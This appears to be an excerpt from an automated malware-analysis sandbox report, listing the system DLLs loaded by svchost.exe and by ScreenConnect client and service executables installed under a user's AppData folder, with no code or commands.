                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
